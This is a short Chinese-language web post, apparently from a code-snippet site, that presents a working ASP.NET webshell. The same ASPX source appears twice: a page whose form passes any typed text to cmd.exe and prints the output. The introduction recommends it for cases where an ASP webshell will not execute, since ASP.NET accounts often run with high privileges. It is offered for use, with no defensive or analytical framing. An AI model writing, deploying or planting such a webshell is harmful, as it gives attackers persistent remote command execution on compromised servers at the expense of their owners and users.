一个ASP.Net下的WebShell实例
作者:
一个ASP.Net下的WebShell,主要完成cmd命令。一般的服务器设置,asp.net用户的权限都比较高。如果asp的webshell无法执行,可能asp.net的可以执行。
代码如下:
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<script runat="server">
protected void exec(object sender, EventArgs e)
{
string item = cmd.Text;
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
string strOutput = null;
p.Start();
p.StandardInput.WriteLine(item);
p.StandardInput.WriteLine("exit");
strOutput = p.StandardOutput.ReadToEnd();
p.WaitForExit();
p.Close();
Response.Write("<pre>");
Response.Write(strOutput);
Response.Write("</pre>");
}
protected void Page_Load(object sender, EventArgs e)
{
}
</script>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="dir c:" /><asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
</form>
复制代码 代码如下:
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<script runat="server">
protected void exec(object sender, EventArgs e)
{
string item = cmd.Text;
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
string strOutput = null;
p.Start();
p.StandardInput.WriteLine(item);
p.StandardInput.WriteLine("exit");
strOutput = p.StandardOutput.ReadToEnd();
p.WaitForExit();
p.Close();
Response.Write("<pre>");
Response.Write(strOutput);
Response.Write("</pre>");
}
protected void Page_Load(object sender, EventArgs e)
{
}
</script>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="dir c:" /><asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
</form>